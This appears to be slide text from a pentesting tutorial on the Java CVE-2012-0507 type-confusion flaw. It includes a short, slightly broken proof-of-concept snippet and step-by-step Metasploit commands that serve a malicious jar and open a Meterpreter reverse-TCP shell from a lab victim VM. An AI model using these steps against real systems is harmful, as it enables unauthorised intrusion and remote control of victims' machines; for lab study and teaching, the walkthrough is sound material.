CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.
3. About CVE-2012-0507
A vulnerability in the JRE due to the fact that The
AtomicReferenceArray class implementation did
not properly check if the array is of an expected
Object[] type. The vulnerability found by Jeroen
Frijters
A malicious Java application or applet could use
this flaw to cause Java Virtual Machine(JVM) to
crash or bypass Java sandbox restrictions.
5. import java.util.concurrent.atomic.*;
class first
{
}
public violateClass
{
public static void main(String a[])
{
Object obj=new first();
AtomicReferenceArray r=new AtomicReferenceArray(new
first[1]);
obj="Hell";
r.set(0,obj);
first f=(first)r.get(0);
}
}
6. Exploiting
By manually constructing a serialized
object graph you can stick any array you
want into an AtomicReferenceArray
instance and then use the
AtomicReferenceArray.set() method to
write an arbitrary reference to violate type
safety.
10. Preparing Target Machine
Start the "Target" Machine.
Install the JRE 6.(I have already
installed the JRE)
11. Preparing Attacker Machine
Now, start the BT5.
Open the Terminal and Type
"msfupdate". This will update the Metasploit
Framework(MSF) with the latest exploits.
12. Open the Terminal and type msfconsole
Now type :
use exploit/multi/browser/java_atomicreferencearray
The above command will use the
java_atomicreferencearray.rb module for the attack.
13. Now type "show options" to display the
settings available and/or required for this
specific module.
14. set SRVPORT 80
set URIPATH /
set SRVHOST [Backtrack_ip]
How to get IP of Backtrack:
○ open the Terminal
○ Type ifconfig
○ It will display the IP
15. Payload
Type "show payloads“ . This will displays the
list of payloads available to use
I am going to use the reverse_tcp payload.
This payload will get reverse tcp connection
from the Target to our machine.
Type set payload java/meterpreter/reverse_tcp
16. In order to get reverse connection, we
have to set Backtrack IP in the LHOST.
So type the following command:
set LHOST [Backtrack_IP]
18. We have setup everything needed for the
Exploit. So it is time to break into the Target
machine.
Type "exploit" in the msfconsole.
19. This will start the reverse handler to our
Machine and it will wait anyone that will
connect to the our HTTP server (Eg:
http://192.168.56.102)
Once victim connect to our server, it will send
a jar will that will exploit the CVE-2012-0507
vulnerability.
20. Victim side
We have set up our exploit. Let us see what
happen when our victim open our url.
Go to the “Target” VM.
Open the Firefox
Enter the url you got from the you got from the
metasploit exploit:
Eg: http://192.168.56.102
No need to care about the „80‟ in the URL becoz
It is default port
21. It loads nothing
but in background :
The Backtrack sends a jar file and
exploit the vulnerability.
After successful exploit, it brings control
to Backtrack
22. Now type "sessions“ in the metasploit
console, this will display the list of
active sessions(victims list)
23. Type "sessions -i 1", this will open the
connection to the session with the id '1' and
bring you to Meterpreter
Meterpreter will help you to interact/control with
the Target
24. Exploited in the Wild
On April 2012, The research conducted by
Dr.Web determined that more than 600,000
Mac computers are infected with
BackDoor.Flashback botnet.
Included in Exploit kits
25. I hope this article has given you a good
insight into how to use MetaSploit Framework
to exploit the Java vulnerability.
I hope this will help you to get into the
PenTesting world..!
For more PenTesting Tutorials :
www.BreakTheSecurity.com